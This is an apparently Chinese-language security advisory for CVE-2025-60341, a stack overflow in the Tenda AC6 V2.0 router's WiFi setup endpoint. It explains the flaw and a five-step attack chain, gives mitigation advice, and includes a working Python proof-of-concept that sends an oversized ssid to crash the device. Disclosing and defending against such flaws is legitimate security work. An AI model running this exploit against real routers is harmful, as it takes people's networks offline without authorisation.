CVE-2025-60341 Tenda AC6 V2.0 栈溢出漏洞导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-60341

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC6 V2.0

漏洞概述

CVE-2025-60341是Tenda AC6 V2.0路由器中的一个高危安全漏洞。该漏洞存在于路由器的WiFi设置功能中，具体位于fast_setting_wifi_set函数的ssid参数处理逻辑中。攻击者可以通过构造超长的ssid参数值触发栈溢出条件，从而导致路由器服务中断或执行任意代码。漏洞的CVSS评分为7.5，属于高危级别。由于攻击向量为网络层面，且无需认证和用户交互，远程攻击者可以在无需任何权限的情况下直接利用此漏洞。这对使用该设备的个人用户和企业网络都构成了严重的安全威胁，可能导致网络服务不可用，影响正常的业务运营。

技术细节

该漏洞是一个典型的栈溢出（Stack Overflow）漏洞，存在于Tenda AC6 V2.0路由器的Web管理界面处理模块中。具体来说，问题出在处理WiFi设置的fast_setting_wifi_set函数对ssid参数的处理上。在该函数的实现中，程序将用户输入的ssid值直接复制到栈上的固定大小缓冲区中，但未对输入长度进行充分的边界检查。当攻击者向该参数提交超过缓冲区容量的超长字符串时，多余的数据会溢出到栈上的其他内存区域，包括函数返回地址等关键数据。攻击者可以通过精心构造溢出数据，覆盖返回地址并控制程序执行流程，从而实现远程代码执行或导致进程崩溃。由于该漏洞位于路由器的网络服务处理路径中，攻击者可以通过HTTP请求直接触发，无需认证或物理接触设备。

攻击链分析

STEP 1

步骤1

信息收集：识别目标Tenda AC6 V2.0路由器，获取其IP地址和Web管理界面访问地址

STEP 2

步骤2

构造攻击载荷：生成超长的ssid参数值（300字节以上），用于触发栈溢出

STEP 3

步骤3

发送恶意请求：向路由器的/cgi-bin/v2/fast_setting_wifi_set接口发送POST请求，包含超长ssid参数

STEP 4

步骤4

触发漏洞：超长字符串覆盖栈上的返回地址和关键数据结构，导致程序控制流被劫持

STEP 5

步骤5

实现攻击效果：触发路由器进程崩溃或重启，造成拒绝服务（DoS）状态

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60341 PoC - Tenda AC6 V2.0 Stack Overflow in fast_setting_wifi_set
# Target: Tenda AC6 V2.0 Router
# Vulnerability: Stack overflow via ssid parameter in fast_setting_wifi_set function

target_ip = "192.168.0.1"  # Default Tenda router IP
target_port = 80

# Generate payload with oversized ssid parameter to trigger stack overflow
# The buffer size is typically 64-128 bytes, so we use 300+ bytes to ensure overflow
payload = {
    "ssid": "A" * 300,  # Overflow payload
    "password": "test1234"
}

def exploit_stack_overflow():
    """Send crafted request to trigger stack overflow in fast_setting_wifi_set"""
    url = f"http://{target_ip}:{target_port}/cgi-bin/v2/fast_setting_wifi_set"
    
    try:
        response = requests.post(url, data=payload, timeout=10)
        print(f"[*] Request sent to {url}")
        print(f"[*] Payload length: {len(payload['ssid'])} bytes")
        print(f"[*] Response status: {response.status_code}")
        
        # Check if device is responsive after exploit
        check_url = f"http://{target_ip}:{target_port}/cgi-bin/login"
        check_response = requests.get(check_url, timeout=5)
        if check_response.status_code != 200:
            print("[+] Exploit successful - Device appears to be unresponsive (DoS)")
        else:
            print("[-] Device still responsive - Try adjusting payload size")
            
    except requests.exceptions.Timeout:
        print("[+] Exploit likely successful - Request timed out (DoS condition)")
    except requests.exceptions.ConnectionError:
        print("[+] Exploit successful - Connection lost (DoS condition)")
    except Exception as e:
        print(f"[-] Error: {str(e)}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-60341 PoC - Tenda AC6 V2.0 Stack Overflow")
    print("=" * 60)
    exploit_stack_overflow()

影响范围

Tenda AC6 V2.0 固件版本 15.03.06.50

防御指南

临时缓解措施

在厂商发布正式安全更新之前，建议采取以下临时缓解措施：1）关闭路由器的远程Web管理功能，仅通过本地局域网访问；2）在防火墙或路由器上限制对管理接口的访问，仅允许受信任的IP地址；3）使用网络监控工具检测异常的HTTP请求模式；4）考虑暂时更换为不受影响的无线路由器型号；5）监控设备运行状态，发现服务异常时及时重启恢复。